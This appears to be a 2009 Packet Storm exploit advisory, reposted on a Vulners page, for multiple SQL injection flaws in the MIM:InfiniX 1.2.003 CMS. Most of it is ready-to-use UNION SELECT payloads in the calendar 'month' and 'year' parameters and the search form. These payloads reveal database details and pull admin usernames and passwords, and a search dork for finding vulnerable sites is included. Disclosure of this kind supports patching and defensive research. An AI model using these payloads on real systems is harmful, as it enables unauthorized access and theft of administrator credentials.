Lucene search
K

MIM:InfiniX 1.2.003 SQL Injection

🗓️ 28 Apr 2009 00:00:00Reported by YEnH4ckErType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

MIM:InfiniX 1.2.003 SQL Injection vulnerability in CM

Code
`--------------------------------------------------------------------------  
MULTIPLE REMOTE SQL INJECTION VULNERABILITIES --MIM:InfiniX v1.2.003-->  
--------------------------------------------------------------------------  
  
CMS INFORMATION:  
  
-->WEB: http://mim.infinix.it  
-->DOWNLOAD: https://sourceforge.net/projects/infinix/  
-->DEMO: http://mim.infinix.it  
-->CATEGORY: CMS / Portal  
-->DESCRIPTION: MIM:InfiniX Manuale Intermediale della Modernita': Infinite Info...  
in Xml PHP-XHTML-XML-XSL-CSS-AJAX-RDF. Design your CMS and store...  
-->RELEASED: 2009-04-21  
  
CMS VULNERABILITY:  
  
-->TESTED ON: firefox 3  
-->DORK: "Developed by rbk"  
-->CATEGORY: MULTIPLE SQL INJECTION VULNERABILITIES  
-->AFFECT VERSION: 1.2.003 (maybe <= ?)  
-->Discovered Bug date: 2009-04-27  
-->Reported Bug date: 2009-04-27  
-->Fixed bug date: 2009-04-28  
-->Info patch: v1.2.003  
-->Author: YEnH4ckEr  
-->mail: y3nh4ck3r[at]gmail[dot]com  
-->WEB/BLOG: N/A  
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.  
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)   
  
  
  
#########################  
////////////////////////  
  
SQL INJECTION (SQLi):  
  
////////////////////////  
#########################  
  
  
<<<<---------++++++++++++++ Condition: magic_quotes_gpc=off +++++++++++++++++--------->>>>  
  
  
-------  
INTRO:  
-------  
  
  
Admin choose to use database or not.  
  
This CMS is completely vulnerable to SQL Injection (I only show some vars).  
  
  
  
------------------  
PROOF OF CONCEPT:  
------------------  
  
  
For example ("month" and "year" GET vars). Links:  
  
  
http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5&year=2009%27+AND+0+UNION+ALL+SELECT+1,version(),database(),4,5,6/*  
  
http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5%27+AND+0+UNION+ALL+SELECT+1,version(),database(),4,5,6/*&year=2009  
  
  
Another example (search post form). Search this:  
  
  
anything%')) union all select 1,database(),version(),user(),5,6,7,8,9,database(),11#  
  
  
----------  
EXPLOITS:  
----------  
  
  
We get the admin credentials:  
  
  
http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5&year=2009%27+AND+0+UNION+ALL+SELECT+1,user,pass,4,5,6 FROM admin WHERE id=1/*  
  
http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5%27+AND+0+UNION+ALL+SELECT+1,user,pass,4,5,6+FROM+admin+WHERE+id=1/*&year=2009  
  
  
anything%')) union all select 1,database(),database(),concat(user,'--::--',pass),5,6,7,8,9,database(),11 FROM admin WHERE id=1#  
  
  
  
  
  
  
#######################################################################  
#######################################################################  
##*******************************************************************##  
## ESPECIAL GREETZ TO: Str0ke, JosS, ... ##  
##*******************************************************************##  
##-------------------------------------------------------------------##  
##*******************************************************************##  
## GREETZ TO: SPANISH H4ck3Rs community! ##  
##*******************************************************************##  
#######################################################################  
#######################################################################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Apr 2009 00:00Current
0.6Low risk
Vulners AI Score0.6
16